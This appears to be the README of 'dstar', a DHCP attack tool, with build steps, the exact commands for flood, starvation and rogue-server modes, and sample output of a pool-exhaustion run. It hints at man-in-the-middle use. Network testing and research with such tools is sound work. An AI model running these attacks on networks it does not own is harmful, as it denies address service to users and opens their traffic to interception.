This tool implement various DHCP attacks and can be used to make experiments and test on your network!
Supported features:
- Flood -> Flood DHCP server with large amount of DHCP discover messages (this attack does not acquire addresses!)
- Starvation -> Try to acquire all addresses in DHCP pool, you can use this option with a rogue DHCP server... MITM? 😏
- Built-in rogue DHCP server
First of all getting the code from repository:
$ git clone https://github.com/jacopodl/dstar Compile it with followings command:
$ cd dstar $ git submodule init && git submodule update $ cmake . $ make Or if you are very busy:
$ ./build.sh Flood DHCP server with discover messages:
$ sudo ./dstar %interface% --flood Exhaust DHCP pool and release all addresses on exit:
$ sudo ./dstar %interface% --starvation without release addresses:
$ sudo ./dstar %interface% --starvation --no-release Setting up rogue DHCP server with the stolen addresses:
$ sudo ./dstar %interface% --starvation --server Getting help with:
$ ./dstar --help $ sudo ./dstar %interface% --starvation @@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@! @@@ !@@ @@! @@! @@@ @@! @@@ !@! @!@ !@! !@! !@! @!@ !@! @!@ @!@ !@! !!@@!! @!! @!@!@!@! @!@!!@! !@! !!! !!@!!! !!! !!!@!!!! !!@!@! !!: !!! !:! !!: !!: !!! !!: :!! :!: !:! !:! :!: :!: !:! :!: !:! :::: :: :::: :: :: :: ::: :: ::: :: : : :: : : : : : : : : : vX.x.x [<---] DHCP DISCOVER [--->] DHCP OFFER [<---] DHCP REQUEST [--->V] DHCP ACK Ip:192.168.1.99 - MAC:52:c5:b9:35:0c:42 lease(s):21600 [<---] DHCP DISCOVER [--->] DHCP OFFER [<---] DHCP REQUEST [--->V] DHCP ACK Ip:192.168.1.118 - MAC:12:3c:09:28:ac:cb lease(s):21600 [<---] DHCP DISCOVER ^CStopping... Releasing addresses... All done! - Multithread capability
- DHCPv6